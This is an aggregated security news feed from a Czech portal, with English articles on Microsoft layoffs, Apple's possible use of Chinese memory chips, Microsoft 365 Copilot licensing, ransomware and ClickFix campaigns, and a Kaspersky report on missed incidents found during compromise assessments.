Security-Portal.cz je internetový portál zaměřený na počítačovou bezpečnost, hacking, anonymitu, počítačové sítě, programování, šifrování, exploity, Linux a BSD systémy. Provozuje spoustu zajímavých služeb a podporuje příznivce v zajímavých projektech.

Kategorie

Microsoft plans to lay off several thousand employees

Computerworld.com [Hacking News] - 1 hodina 26 min zpět

Microsoft is expected to announce a new round of layoffs next week, with several thousand jobs at stake, according to Business Insider. Among others, the company’s sales, consulting, and Xbox divisions will be affected.

The cuts are reported to affect less than 2.5% of Microsoft’s approximately 220,000 employees worldwide, meaning the layoffs will be less extensive than last year’s workforce reductions.

In 2025, Microsoft laid off approximately 15,000 employees in two rounds: 6,000 workers in May, followed by another 9,000 in July.

The company is reportedly rolling out the cost-cutting measures while continuing to boost investments in AI. Microsoft has faced increased pressure from investors regarding how AI will affect the company’s future business model and cost structure.

Earlier this year, the company for the first time in its history offered voluntary retirement buyouts to roughly 8,750 employees, or about 7% of its workforce.

Kategorie: Hacking & Security

Google Disrupts NetNut Residential Proxy Network Spanning 2 Million Home Devices

The Hacker News - 2 hodiny 10 min zpět
Google has significantly degraded NetNut, one of the biggest networks that turns home devices into rented relays for other people's traffic. Working with the FBI, Lumen, and others, Google's Threat Intelligence Group (GTIG) said this week it had reduced the network's pool of usable devices by millions. Google identifies NetNut, also tracked as Popa, as a network spread across home Swati Khandelwalhttp://www.blogger.com/profile/[email protected]
Kategorie: Hacking & Security

Ransomware Groups Turn to Citrix Bleed 2, BYOVD, and Supply Chain Credentials

The Hacker News - 2 hodiny 34 min zpět
Threat actors associated with the Anubis ransomware operation have been observed exploiting the Citrix Bleed 2 (CVE-2025-5777) vulnerability to obtain initial access. "Although tactics differ between affiliates, common patterns emerged in tradecraft through use of legitimate Remote Management and Monitoring (RMM) tooling, credential access, and hands-on-keyboard procedures used for lateral Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]
Kategorie: Hacking & Security

Cheap Chinese chips could offer way out of RAM price crisis, Apple suggests

Computerworld.com [Hacking News] - 4 hodiny 10 min zpět

The RAM price crisis is pushing hardware manufacturers to pursue deals with Chinese companies, against the wishes of the US government. Apple is one of those reportedly exploring such deals.

“Apple is in negotiations to purchase chips from Chinese semiconductor makers ChangXin Memory Technologies Inc. (CMTI) and Yangtze Memory Technologies Co. (YMTC) to help reduce the impact of a global memory shortage,” Bloomberg reported. “The companies are on a Pentagon blacklist of Chinese entities believed to support Beijing’s military, and Apple’s effort to buy chips from them has included appeals to Trump administration officials to help soften the political fallout,” it said.

Rumors surrounding Apple talking with CMTI and YMTC have been going on for months, with analyst Ming-Chi Kuo pointing to Apple CEO Tim Cook being “one of the few tech leaders who can still navigate both Washington and Beijing, so this is better handled before he steps down as CEO.”

Beyond the potential political ramifications, any deal would have immediate implications for enterprise IT buyers.

“CIOs should focus on the risk that this strategy could introduce. Will Apple be able to thoroughly assess those chips to completely rule out the possibility of trojan horses, backdoors, and hidden functionality such as dead man switches?” asked Flavio Villanustre, CISO for the LexisNexis Risk Solutions Group. “If Apple says that they will do, to what degree of certainty? There have been rumors about hidden backdoors in chips before, such as Supermicro in 2018, ESP32 microcontroller hidden functionality in 2025, and Microsemi backdoor in 2012, to name a few.”

On the naughty list?

This issue gets complicated based on what the US government ultimately does. The two Chinese manufacturers figure on the Pentagon’s so-called 1260H list of “entities identified as Chinese Military Companies,” which also includes Chinese internet giants Alibaba, Baidu, and Tencent; router maker TP-Link Technologies; and drone maker DJI. Being on that list has no real consequences for the companies concerned, but the government could move them to the Department of Commerce’s Entity List, subjecting them to export licensing requirements, or make them the subject of a Section 889 clause, barring them from government procurement deals. That could sharply change the dynamics for Apple and other technology vendors seeking cheaper RAM supplies — and for their customers.

Noah Kenney, principal consultant for Digital 520, said, “Currently, CXMT is only on the Pentagon’s 1260H list, which doesn’t legally bar transactions. Inclusion in the Commerce Department Entity List placement would, which is what Apple is seeking to prevent here.”

He suggested Apple might try to limit blowback by only using the Chinese chips in Apple devices sold in China.

If the government does intensify restrictions and if components from YMTC or CXMT “show up in a customer contract you already signed, a standard-issue device becomes a procurement compliance question. Fleet inventory in MDM will need to track memory sourcing, not just device model. That is a capability most enterprises do not have today,” Kenney said. “The real question for a CIO is not whether Washington pushes back on Apple, but whether their customers will push back for shipping Apple.”

Other vendors use Chinese RAM already

“Lenovo has sourced from Chinese memory makers for years,” as have other manufacturers, Kenney said. “The difference is that they are not lobbying the Treasury Secretary about it.”

Geopolitical analyst Irina Tsukerman said Apple could clear the way for more vendors to use cheaper RAM.

“If Apple absorbs the political criticism and keeps enterprise buyers comfortable, competitors would gain room to consider Chinese memory for selected markets or less sensitive product channels,” Tsukerman said. “If Washington turns Apple into an example, other manufacturers would become more careful around government-facing sales and reserve this kind of sourcing for places where US procurement pressure has less impact.”

Tsukerman agreed with Kenney that IT departments will need to improve component visibility.

“Enterprise CIOs should take this seriously because Apple’s reported sourcing discussions turn a normally invisible component decision into something that can affect procurement credibility, especially for buyers whose technology choices are reviewed through government or regulated-sector requirements,” Tsukerman said.

The lack of a clear product quality issue is what will make this a delicate IT dance, Tsukerman said.

“Engineers could see limited practical danger from memory sourcing alone, and procurement reviewers could still see a serious issue because the supplier has already been placed in a national-security category,” she said.

This article first appeared on Network World.

Kategorie: Hacking & Security

Jamf exec: The exploit isn’t what gives attackers away

Computerworld.com [Hacking News] - 5 hodin 2 sek zpět

Jamf this week unveiled Beacon, a threat-hunting service that aims to provide dedicated, proactive detection and analysis of Mac threats. The new security tool relies on Jamf’s Mac telemetry, which equips Jamf Threat Labs with the kind of deep visibility it needs to hunt for Apple-specific attacks, anomalous activity and suspicious behaviors. 

Security is always a major issue, but the threat environment is only becoming more complex, with AI adding a whole new set of dangers to fear. The unique nature of the Mac creates a paradox: while more employees want to use Macs, organizations sometimes lack the relevant internal expertise to support and secure them. Even with the correct endpoint security tools and policies in place, blue teaming can be under-resourced. As a result, organizations struggle to start, scale, repeat, and measure effective Mac threat-hunting programs.

Even the smallest business needs security protection at quite a high level — but who can afford a whole threat detection and remediation team?

With that in mind, Jaron Bradley, director of Jamf Threat Labs, offered more details about the company’s newly-introduced security service and broader security issues affecting Mac fleets in the business world.

Jaron Bradley, director of Jamf Threat Labs.

Jamf

AI is boosting attackers, what is the current environment, and why is awareness becoming more essential? “AI is primarily changing the speed at which attackers operate. We’re seeing this across the board: malicious websites go live faster, malware gets built faster, and malware adapts faster once it’s detected in the wild. That said, AI isn’t only benefiting attackers; defenders have gained just as many new capabilities from it. The bigger question is who can use it better.

“AI has effectively lowered the skill floor, so someone who would have once been dismissed as a ‘script kiddie’ can now build functional malware or ransomware with far less expertise than before. That’s why awareness matters more now: the pool of capable attackers is growing even faster.”

Is perimeter security a realistic ambition anymore? “This may depend on the company and its office requirements, but many would argue that security shifted from the perimeter to the endpoint long ago. That doesn’t mean perimeter security is dead; it simply means it’s one layer in a broader defense strategy. Many security analysts have found detection and analysis of novel threats to be more achievable at the endpoint level.”

If AI identifies a vulnerability and moves to exploit it, how likely is Beacon to identify the attack taking place? “AI has certainly changed the threat landscape, especially around vulnerability discovery and exploit development. The good news for expert threat hunting is that this doesn’t have a large effect on our ability to detect attacks.

“Zero-days have always existed, and while AI raises the stakes by accelerating how quickly they’re found and weaponized, it’s usually the activity attackers perform after using an exploit, not the exploit itself, that gives them away. No defense is ever truly complete, so the real differentiator has always been how fast and how well you notice when something’s wrong. That’s exactly where Beacon is built to add value: expert knowledge of what this malicious activity looks like in the Apple environment.”

Q: What sort of threats are you seeing right now? “Infostealer malware remains the single biggest threat to macOS right now. These stealers trick users into running them through convincing fake websites and social engineering, then exfiltrate as many credentials and secrets as possible for the attacker to use, sell, or trade on the dark web. 

“Apple regularly ships new protections, and attackers just as regularly adapt their social engineering to stay ahead of them. Techniques like ClickFix, where users are tricked into pasting and running malicious commands themselves, have become especially effective because they bypass many protections entirely by getting the user to do the work. Beyond that, supply chain attacks are growing at an alarming rate, with attackers compromising developer libraries that get pulled into internal or production projects, quietly introducing backdoors without the creator’s knowledge.”

Q: What about the manufacturing sector? Is there any excuse to use legacy kit at all in an AI threat age? “AI generated threats won’t necessarily be different than traditional ones, but they will stress the seams of traditional security programs that will need to have improved visibility at scale and be able to work at a new kind of speed and agility from start to finish.”

Q: Should IT delay security releases at all anymore? “It’s difficult to find a one-size-fits-all answer here. Delaying a release makes sense when the risk of shipping outweighs the cost of waiting, and that calculation looks very different for a hospital system than it does for a consumer app. The more meaningful shift in recent years isn’t about delaying more or less; it’s about catching problems earlier, so delaying becomes the exception rather than the standard. Both rushing and waiting carry real risks, so the decision should weigh multiple factors, particularly when security updates are on the line.”

Please join me on social media at BlueSky,  LinkedIn, or Mastodon, and do subscribe my daily human-curated Apple news headline summary on Substack.

Kategorie: Hacking & Security

Trojanized GitHub PoC Repositories Deliver ChocoPoC Malware to Security Researchers

LinuxSecurity.com - 5 hodin 17 min zpět
GitHub has become the latest delivery mechanism for malware aimed at security researchers. 
Kategorie: Hacking & Security

ThreatsDay: AI Compute Hijacking, Apple Email Flaw, BlueHammer Ransomware + 14 Stories

The Hacker News - 5 hodin 40 min zpět
This week’s security news is mostly about weak spots. Browsers, bots, sandboxes, AI systems, and email flows all show the same problem in different ways. Everything looks normal until someone tests a small gap and finds a way through. This is not one big break. It is small permissions, weak checks, open systems, and normal tools doing things they were allowed to do. That same pattern runs Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]
Kategorie: Hacking & Security

Google loses final appeal to overturn €4.1 billion EU fine

Bleeping Computer - 5 hodin 46 min zpět
Court of Justice of the European Union (CJEU) has dismissed Google's final appeal against a €4.1 billion ($4.7 billion) antitrust fine over the company's use of Android to promote its Chrome browser and search service. [...]
Kategorie: Hacking & Security

ConsentFix and ClickFix: How Microsoft 365 Accounts are Hijacked in 3 Seconds

Bleeping Computer - 7 hodin 4 min zpět
ConsentFix and ClickFix attacks steal Microsoft 365 tokens in seconds using fake prompts and OAuth flows. Learn how these MFA bypass tactics work and how to defend against them. [...]
Kategorie: Hacking & Security

ToddyCat-Linked Umbrij Malware Abuses OAuth to Access Gmail via Google API

The Hacker News - 8 hodin 52 sek zpět
The threat actor known as ToddyCat has been attributed to a new malware called Umbrij that's designed to gain surreptitious access to a victim's email correspondence via the Google API. "In this campaign, the attackers focused their attention on corporate email communications hosted on Gmail, targeting access compromise via APIs," Kaspersky said in a detailed report published this week. "Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]
Kategorie: Hacking & Security

Microsoft fixes bug that removed Copilot buttons in Outlook

Bleeping Computer - 8 hodin 49 min zpět
Microsoft has fixed a known issue causing the Copilot Chat or Copilot buttons in Classic Outlook to disappear for Windows users with the Copilot Chat (Basic) license. [...]
Kategorie: Hacking & Security

Cisco finally confirms attackers exploiting Unified CM flaw

Bleeping Computer - 9 hodin 29 min zpět
Cisco confirmed that attackers are now exploiting a Unified Communications Manager (Unified CM) vulnerability patched in early June. [...]
Kategorie: Hacking & Security

Identity Lifecycle Management Wasn't Built for AI Agents 

The Hacker News - 9 hodin 35 min zpět
Identity lifecycle management was architected around a person with an employment record, a manager, and a departure date. AI agents have none of those. As autonomous principals proliferate across enterprise environments, the governance model built for humans develops structural blind spots that traditional IGA tools weren't designed to detect. This guide covers where that model breaks, what it [email protected]
Kategorie: Hacking & Security

Microsoft 365 Copilot: Office meets genAI and agents

Computerworld.com [Hacking News] - 10 hodin 5 min zpět

First launched in November 2023, Microsoft 365 Copilot brings a range of generative AI (genAI) features to Microsoft Office productivity apps, such as Word, Outlook, Teams, and Excel. With capabilities ranging from quick meeting summaries to in-depth data analysis, it’s available via a paid add-on license for Microsoft 365 enterprise and small-business customers.

Initially hampered by underwhelming capabilities and a hefty price tag for businesses of all sizes, M365 Copilot has slowly gained traction in business as its abilities have increased and the integrations between Copilot and various M365 apps and services have improved. With numerous feature rollouts over the past three years, Microsoft has gradually repositioned M365 Copilot from a simple chatbot to a collection of autonomous agents that can carry out tasks across the M365 ecosystem.

The company has also goosed adoption by introducing a more affordable pricing tier for small businesses and (temporarily, as it turns out) allowing commercial users with a standard M365 license to use Copilot in the Office apps, even without the add-on M365 Copilot license.

Microsoft 365 Copilot pricing: 2026 tiers TierMonthly cost (paid annually)AvailabilityM365 Copilot$30 / userFor organizations with more than 300 seats; required for in-app Copilot integration in organizations with more than 2,000 seatsM365 Copilot Business$21 / userFor organizations with 10 – 300 seatsAgent 365 (add-on management layer)$15 / userAvailable as standalone subscription or included in the new M365 E7 Frontier Suite Microsoft 365 Copilot today

In this way, Microsoft 365 Copilot has moved from genAI curiosity to a key part of many enterprises’ workflows. In January 2026, Microsoft said it had 15 million paid M365 Copilot seats, a figure the company raised to 20 million in April.

However, its momentum now faces a challenge as Microsoft limits access to Copilot Chat, a freemium version of the paid M365 Copilot, for its largest enterprise customers.

Specifically, for commercial customers with more than 2,000 seats, Microsoft has removed in-app Copilot Chat access from Word, Excel, and PowerPoint for users without a Microsoft 365 Copilot license. To maintain that integration, large organizations must now pay for the full $30/user/month M365 Copilot license. The M365 Copilot license includes what Microsoft calls priority access to Copilot capabilities, which provides “faster response times and more consistent availability compared to standard access,” according the the company.

Smaller firms (less than 2,000 seats) that have a Microsoft 365 license but not the add-on M365 Copilot license will maintain standard access to Copilot from within the Office apps. Microsoft warns that standard users may experience longer response times and temporary feature limitations as the service shifts resources to its higher-tier customers during peak hours.

When signed in to the Copilot Chat hub, users can see which version of Copilot they have by looking for one of the following labels at the bottom of the left sidebar:

  • Copilot Chat (Basic) means the user doesn’t have an M365 Copilot license and can’t use Copilot in the Office apps. They can use the standalone Copilot Chat app with standard access.
  • M365 Copilot (Basic) means the user doesn’t have an M365 Copilot license but does have standard access to Copilot in the Office apps.
  • M365 Copilot (Premium) means the user has an M365 Copilot license and has priority access to Copilot in the Office apps.

Users with paid M365 Copilot licenses also get advanced features including the ability to pull in data from across the M365 environment (documents, meetings, emails, chats, etc.), extensive use of agents including “advanced” agents like Researcher and Analyst, and the ability to create custom agents. See Microsoft’s “How Copilot Chat works with and without a Microsoft 365 Copilot license” page for details.

What’s new with Microsoft 365 Copilot >
  • Licensing shift: Large enterprises (more than 2,000 seats) cannot access Copilot directly in Office apps without the M365 Copilot license.
  • Multimodel access: M365 Copilot now supports non-OpenAI models like Anthropic’s Claude 4, allowing users to choose the best logic for specific tasks.
  • Agentic pivot: The focus shifts from simple chat to autonomous agents that execute multi-step workflows across the M365 ecosystem.
  • What other Copilots does Microsoft offer?

    It’s worth noting that Microsoft uses the term “Copilot” for a wide variety of genAI tools and functions. Individual users with M365 Personal, Family, and Premium subscriptions can use Copilot in Office apps, but with fewer features and privileges than business users get with a Microsoft 365 Copilot license. There’s also a free consumer version of Copilot with very limited functionality.

    Adding to the confusion, the company offers several specialized enterprise versions of Copilot for specific purposes, including Microsoft Copilot Studio, Microsoft Security Copilot, Azure Copilot, and GitHub Copilot, as well as additional Copilot “experiences” for Microsoft products such as Dynamics 365, Power Platform, and Microsoft Fabric.

    Also available: agents in M365 Copilot built for specific industries, including finance, sales, and service.

    From chatbot to multi-model researcher to agentic powerhouse

    Microsoft has moved away from a single-model approach for its AI assistant. Copilot Chat has evolved into a Frontier interface, allowing users to select among different LLMs (large language models) such as GPT-5.4 and Anthropic Claude 4 for specialized tasks.

    A persistent AI risk for enterprises is overly permissive data access. Because Copilot inherits the permissions of the user, any file that is improperly shared within an organization can be surfaced by the AI. To combat the issue of business-critical files that are at risk due to inappropriate classification, Microsoft has integrated Purview Data Security Posture Management (DSPM) more deeply into Copilot, alerting users when they are generating content from unclassified or sensitive sources.

    Other recently introduced M365 Copilot features include:

    • Copilot Researcher: This feature allows the assistant to pull from multi-model intelligence, comparing perspectives from different AI models side-by-side to reduce hallucinations.
    • Copilot Notebooks: Notebooks allow you to ground the AI in specific project context. These can now be exported directly into structured Excel spreadsheets or PowerPoint decks, bypassing the need for manual copy and pasting.
    • Teams Interpreter: Integrated directly into Teams Phone, Interpreter is designed to provide real-time, AI-powered language interpretation during live calls, a boon for global enterprise operations.
    • App Builder: A no-code tool that lets business users create apps, workflows, and agents using natural language prompts. It’s essentially a “lite” version of Microsoft’s high-end Copilot Studio environment for developers.
    • Agents for Word, Excel, and PowerPoint: Advanced modes that allow Copilot to take direct action on documents and files rather than simply suggest changes.

    Even more notable was the June launch of Copilot Cowork, which Microsoft pitches as an AI agent for M365 Copilot that can independently perform long-running, multi-step tasks, even when a user’s computer is turned off. Unlike Anthropic’s Claude Cowork, which can interact directly with files and applications on a user’s computer, Copilot Cowork runs in Microsoft’s cloud environment and acts on documents held in a customer’s Microsoft 365 tenant. Copilot Cowork requires a Microsoft 365 Copilot license and is billed based on usage.

    Another announcement that caused a stir was Microsoft’s unveiling of Scout, its first autonomous agent built on the open-source OpenClaw platform. By integrating OpenClaw-style agentic capabilities, Microsoft hopes to transform Copilot into an always-on system that can, for instance, scan Outlook email inboxes and calendars to suggest daily priorities. Microsoft’s implementation addresses security concerns around self-hosted agents by isolating professional-grade “autopilots” within specific roles and applying managed permission guardrails. Scout is available as an “experimental release” to customers of Microsoft’s Frontier program.

    Industry analysts note that these tools are new and unproven, and IT leaders should use caution when testing them and evaluating costs.

    Managing AI agent sprawl: Enter Agent 365

    As organizations move beyond simple chat to building custom declarative agents in Copilot Studio, the risk of shadow AI has become a concern. Gartner reports that 86% of IT leaders require additional governance to manage these agents.

    Available as an add-on subscription for Microsoft 365 or bundled in the top-end M365 E7 package, Agent 365 acts as a control plane for the AI ecosystem. Unlike the user-facing Copilot, Agent 365 is a back-end dashboard that allows IT admins to manage agents in various ways:

    1. Registry and lifecycle management: View every agent — Microsoft, third-party, or internally developed — in a “single-pane-of-glass” dashboard.
    2. Policy-based guardrails: Admins can set global rules to prevent agents from accessing high-sensitivity data (like payroll), even if the human user has permission.
    3. Unified ROI analytics: Leaders can track which agents are actually driving value, allowing for precise seat-count adjustments during renewal cycles.

    Microsoft Agent 365 quick facts Pricing$15 / user / month (as an add-on) or included in the Microsoft 365 E7 suite ($99 / user / month)Core functionsCentralized registry, access control, and performance analytics for all AI agentsObjectiveDesigned to prevent agent sprawl and ensure agents from partners (e.g., Adobe, ServiceNow, etc.) follow M365 security rules

    Gartner says that Agent 365 is still a work in progress and has yet to prove it can actually reduce costs in IT operations. The analyst firm advises customers to assess Agent 365 but not necessarily move to it or the E7 bundle right away.

    Copilot vs. AI in other productivity apps

    Most vendors in the productivity and collaboration software market have added genAI and agentic tools to their offerings at this point.

    The rivalry between Microsoft and Google has heightened in 2026. While Google has faced criticism for a messy transition from the Google Assistant to Gemini, it remains a price leader by embedding Gemini features directly into most tiers of its office suite, Google Workspace.

    In contrast, Microsoft seems to be threading a needle, tightening Copilot Premium licensing for large enterprises while making basic Copilot features available to smaller customers without an add-on license. The goal may be to standardize AI as a commodity while reserving the high-value agentic features for the highest-paying enterprise customers.

    While Microsoft focuses on the productivity suite, Salesforce is positioning Slack as the “agentic operating system” for the enterprise. As of April 2026, Slack AI has moved beyond summarizing to orchestrating agentic workflows. This is designed let you trigger complex, multi-step actions across non-Microsoft systems directly from a Slack thread.

    Salesforce’s Agentforce platform uses the Atlas Reasoning Engine, which is designed to offer autonomous front-office automation (sales, service, and marketing). For organizations where CRM data is more critical than Word documents, Agentforce is emerging as a formidable, high-ROI alternative to Copilot.

    Gartner’s 5 stages of agentic AI evolution > Gartner projects that agentic AI could drive approximately 30% of enterprise application software revenue by 2035. The analyst firm’s roadmap identifies five maturity stages for IT leaders:

    >
  • 2025: AI assistants: Embedded helpers that simplify tasks but remain dependent on human input
  • 2026: Task-specific agents: Agents capable of end-to-end complex tasks, such as real-time cybersecurity-threat response
  • 2027: Collaborative agents: Multi-agent systems that work together across data environments to solve multifaceted business problems
  • 2028: Agentic front ends: A shift where a third of user experiences move away from native apps toward “agentic interfaces” that navigate multiple apps on behalf of the user
  • 2029: Democratized ecosystems: A new normal where 50% of knowledge workers actively govern or create agents on demand for complex tasks
  • In March 2026, Apple launched Apple Business, a platform designed to integrate Apple Intelligence directly into macOS and iOS. Apple claims its competitive edge is its on-screen awareness. Unlike cloud-heavy competitors, Apple Intelligence is built to act across apps locally, appealing to regulated industries concerned about data leakage.

    Apple Business now supports automated Managed Apple Accounts via integration with Microsoft Entra ID, a feature designed to let IT teams manage Apple’s AI features using their Microsoft identity stack.

    As Microsoft tightens the reins on free access, the question for enterprise IT leaders is no longer whether Copilot can summarize a meeting, but whether the $30-per-month leap delivers enough agentic automation to justify the cost. For many, the answer will lie in the effectiveness of Agent 365 in bringing order to the burgeoning fleet of AI workers.

    This article was originally published in February 2025 and most recently updated in July 2026.

    More on Microsoft 365 Copilot:

    Kategorie: Hacking & Security

    CISA: Microsoft SharePoint RCE flaw now actively exploited

    Bleeping Computer - 10 hodin 12 min zpět
    CISA warned on Wednesday that attackers have begun exploiting a high-severity Microsoft SharePoint remote code execution vulnerability patched in May. [...]
    Kategorie: Hacking & Security

    Opera rolls out Paste Protect feature to fight ClickFix attacks

    Bleeping Computer - 10 hodin 18 min zpět
    Opera has introduced Paste Protect, a security feature designed to block ClickFix-style attacks that trick users into executing malicious commands through social engineering. [...]
    Kategorie: Hacking & Security

    AI Agent Exploits Langflow RCE to Automate Database Ransomware Attack

    The Hacker News - 11 hodin 1 min zpět
    Security firm Sysdig says it has found what it believes is the first ransomware attack run from start to finish by an AI agent. Its Threat Research Team calls the operator JADEPUFFER and says a large language model handled the whole job: breaking in, stealing credentials, moving deeper into the network, then encrypting and wiping a company's production database. Ransomware has alwaysSwati Khandelwalhttp://www.blogger.com/profile/[email protected]
    Kategorie: Hacking & Security

    Missed incidents, persistent threats, and response gaps: Insights from compromise assessment projects

    Kaspersky Securelist - 12 hodin 4 min zpět

    The following analysis presents the key findings from Kaspersky Compromise Assessment engagements performed in 2025. A compromise assessment is an independent, expert-driven service that examines whether a target network has been compromised. The service combines threat intelligence analysis (including darknet sources), tool-aided endpoint scanning, a systematic review of security event logs and network traffic, and, when necessary, an initial incident response and digital forensic investigation.

    This report focuses on missed incidents – threats that remained undetected for weeks, months, or even years.

    Key trends observed during compromise assessment engagements
    • Proactive compromise assessment decreases the number of missed high-severity incidents. The highest proportions of high-severity incidents were revealed in organizations that requested our compromise assessment service after containing a known incident. The lowest proportions of high-severity incidents were observed in organizations that conducted regular audits. Of all the incidents discovered, 20% were found manually, while enterprises missed 60% because of the absence of high-confidence alerts from the tools in place.
    • Nearly a third of discovered incidents took over three months to detect. The longer a threat persisted in the target environment, the greater the likelihood that an incident would be severe. 30.8% of all discovered incidents and 52% of high-severity compromises had historical activity spanning over three months. The oldest incident discovered in 2025 had gone undetected for four years.
    • Malicious files often remain in backups and are restored after incident response activities. 40% of all discovered web shells resided in backups and went unnoticed until a proper compromise assessment was conducted.
    • Threat actors rely on remote management tools and LoLBins. These types of tools were found in all compromise assessment engagements that resulted in an incident detection.
    • Monitoring tools and controls are not self-sufficient; operational maturity makes the difference. Monitoring tools must be configured and adapted to the changing threat landscape. Furthermore, human analysts need to review low-confidence alerts. A lack of continuous monitoring and threat hunting activities increased the likelihood of high- and medium-severity incidents to 84–86%. At the same time, high‑severity incidents were rare among organizations with in-house capabilities to reverse-engineer malware.
    • Communication issues lead to missed incidents. Nearly a third of the compromise assessments revealed communication issues that impacted incident response activities.
    • The incident response playbook is not set in stone. For incident response to be efficient and effective, playbooks must be updated as new artifacts are discovered. Treating the incident response plan as a living document reduces the risk of missing threats.
    About the Kaspersky Compromise Assessment service

    Our global compromise assessment portfolio spans several regions. In 2025, around 71% of the incidents we identified affected our customers in the META region, while the APAC and CIS regions accounted for the remaining 29%.

    Geographic distribution of incidents identified during Kaspersky Compromise Assessment projects in 2025 (download)

    Our service was requested by organizations from a diverse set of sectors. The government sector accounted for around 29% of incidents, followed by the education (19%) and financial (17%) sectors.

    Distribution of economy sector incidents identified during Kaspersky Compromise Assessment projects in 2025 (download)

    Detection logic families

    Our compromise assessments operate on a continuously updated catalogue of indicators of attack (IoAs). Because the raw set of IoAs is too granular for high-level reporting, we map them to a concise set of detection logic families. The statistics indicate that three detection families dominate the incident mix:

    • Credentials from dumps: 12.4% of all incidents;
    • Specific living-off-the-land (LOTL) tools: 11.2 %;
    • Specific malware families: 11.2 %.

    These three detection logic families represent high-fidelity indicators of attack that reliably signal infrastructure compromises ranging from dormant, disk-based malware to persistent and multi-stage attacks.

    Distribution of detection logic families (download)

    Reasons for requesting Kaspersky Compromise Assessment services

    Analysis of our compromise assessment engagements that took place in 2025 reveals a clear correlation between the stated purpose of the engagement and the risk profile of the findings. General audits dominate the portfolio with 56% of requests, followed by authority reporting engagements (19%), post-incident checkups (17%), and acquisitions (9%).

    Statistics on the reasons behind CA project requests (download)

    When the findings are classified by severity, the post-incident checkup category exhibits the highest proportion of high-severity incidents (40.7%). The full breakdown is shown below.

    Incident severity breakdown by service engagement reason Incident severity (%) High Medium Low Reason for service Acquiring new company 28.6 42.8 28.6 General audit 27.7 36.7 35.6 Report to an authority 30 46.7 23.3 Checkup after a cybersecurity incident 40.7 25.9 33.4

    Post-incident checkups are frequently initiated after an initial incident response (IR) effort. The elevated share of high-severity findings suggests that IR activities, which are typically limited to containing a known incident, do not provide a complete view of the broader environment. Consequently, other threats may remain undetected until a full compromise assessment is performed.

    Merger and acquisition-related assessments are proactive assessments performed when a company acquires another entity. This involves the target’s network being scanned for hidden threats before the two environments are merged. These assessments demonstrate a balanced distribution of severity: 28.6% low-severity, 42.8% medium-severity, and 28.6 % high-severity. This reflects the mixed risk posture of target environments of acquisitions, which are often evaluated for both known vulnerabilities and hidden malicious activity. Similarly, other proactive approaches like general audit assessments or assessments driven by the need to regularly submit a compliance report to a regulatory authority, share almost the same ratio. This indicates that regular, proactive and compliance-oriented assessments tend to reveal substantive issues earlier in the attack lifecycle, reducing the likelihood that they will evolve into high-severity incidents.

    Organizations that conduct regular audits have the highest rate of low-severity findings (36%) and the lowest rate of high-severity issues (28%). We can assume with medium confidence that continuous, proactive compromise assessments are more effective at limiting the emergence of high-severity compromises than reactive, incident-driven evaluations. The data collected in 2025 are consistent with this hypothesis. Integrating regular, third-party compromise assessments into governance processes can therefore reduce the probability of unexpected high-severity findings and improve overall risk posture.

    The following case study illustrates the impact of relying on a reactive rather than proactive approach. It describes a persistent threat that remained dormant on a client’s network and was only discovered after a comprehensive compromise assessment was performed following initial IR activity.

    Case study: Dormant threat uncovered only by a compromise assessment

    A midsize enterprise suffered a high-severity intrusion that was contained and remediated by the IR team within the defined scope of the initial alert. Following containment, the organization requested a check to determine if any additional footholds existed elsewhere in the network. To address this need, the organization engaged Kaspersky’s Compromise Assessment (CA) service, which performed a full forensic review of the environment beyond the scope of the initial incident.

    Compromise assessment experts collected forensic metadata, historical security event logs, and Active Directory configuration data from the entire infrastructure. Threat hunting queries were executed against the aggregated telemetry, focusing on persistence mechanisms, lateral movement artifacts, and anomalous process activity. As a result, a number of severe threats were detected and reported; for example, malicious persistence:

    1. A cron job that recreates a web shell
      A critical Linux system (web server) had a cron job that automated fetched a copy of a PHP web shell from a public GitHub repository and placed it in an online directory. Even if the file was removed by security personnel, the cron job would simply download it again, giving the attacker a persistent remote code execution point on the web server.
    2. A live reverse shell
      On a server hosting a published web application, the process list showed a bash reverse shell.It was run by a user with the username “apache,” which was the account used to run the web application. This may indicate that the attacker exploited a vulnerability in the web application to gain remote code execution, allowing them to establish a reliable command and control channel that bypassed the firewall because it was initiated from inside the network.
    3. ClipBanker data stealer persisting via Windows registry
      A ClipBanker variant was detected on a user’s workstation machine maintaining persistence by adding itself to the registry key HKU\S-1-5-21-[REDACTED]-500\Software\Microsoft\Windows\CurrentVersion\Run\9Er6IIp.

      This was done after adding the malware’s folder to Windows Defender exclusions and applying hidden and system attributes to the file to hide it from regular users.
    4. Malicious WMI event consumer with deceptive alias
      A malicious WMI event consumer was detected that downloads and executes a PowerShell script. It created the alias “Kaspersky” for “Invoke-Expression” in an attempt to blend in as legitimate activity in the hope that a quick glance at the script would not raise suspicion. Kaspersky’s Cyber Threat Intelligence confirmed that the downloaded script (no longer reachable) was a weaponized payload used to spread the infection further.

    The IR containment was rapid, focused and effective in addressing the specific incident that triggered the alert. However, the broad-scope compromise assessment revealed multiple backdoors across the environment, each using a different persistence technique: cron jobs, scheduled registry runs, and WMI subscriptions. The infected hosts were outside the original IR scope, so they remained unseen until a comprehensive hunt was conducted.

    Incident response excels at stopping the bleeding and ensuring business continuity after a known incident. A compromise assessment provides a health check that determines whether any other wounds exist. By pairing timely IR with regular, full network compromise assessments, the organization had both the reactive agility to contain incidents and the proactive visibility to eradicate malicious persistence wherever it was hiding. The investigation uncovered additional undetected footholds, providing a clearer view of the environment and reducing the likelihood of a repeat incident.

    Missed long-term incidents

    The statistics on the mean time to detect (MTTD) incidents identified during compromise assessment projects are concerning. Many incidents go unnoticed for extended periods. For example, in 2025 we identified an incident that was approximately four years old!

    Such prolonged detection times can lead to severe consequences, as 30.8% of incidents have historical activity spanning over three months. These incidents can range from dormant malware to persistent threats, highlighting the need for robust detection and response mechanisms.

    Severity distribution of incidents by MTTD (download)

    The relationship between detection latency and incident severity was analyzed by grouping findings according to their MTTD:

    • For incidents detected within the first month, severity is more or less evenly distributed among the low, medium and high categories.
    • However, as the MTTD increases, the severity of incidents shifts towards higher severity. Notably, a high proportion of incidents that took between 30–60 days to be detected are medium-severity incidents (78.57%), while those detected between 60–90 days are predominantly high-severity (71.43%).
    • Among incidents detected after 90 days, a significant proportion are also high-severity incidents (52%).

    Overall, 52% of high-severity incidents are only identified after 90 days of going undetected. This represents a concrete risk: the longer an incident goes undetected, the higher the probability of severe compromise. Organizations that integrate continuous detection, threat hunting activities, and regular compromise assessments can reduce MTTD, limit threat escalation, and lower their overall risk profile.

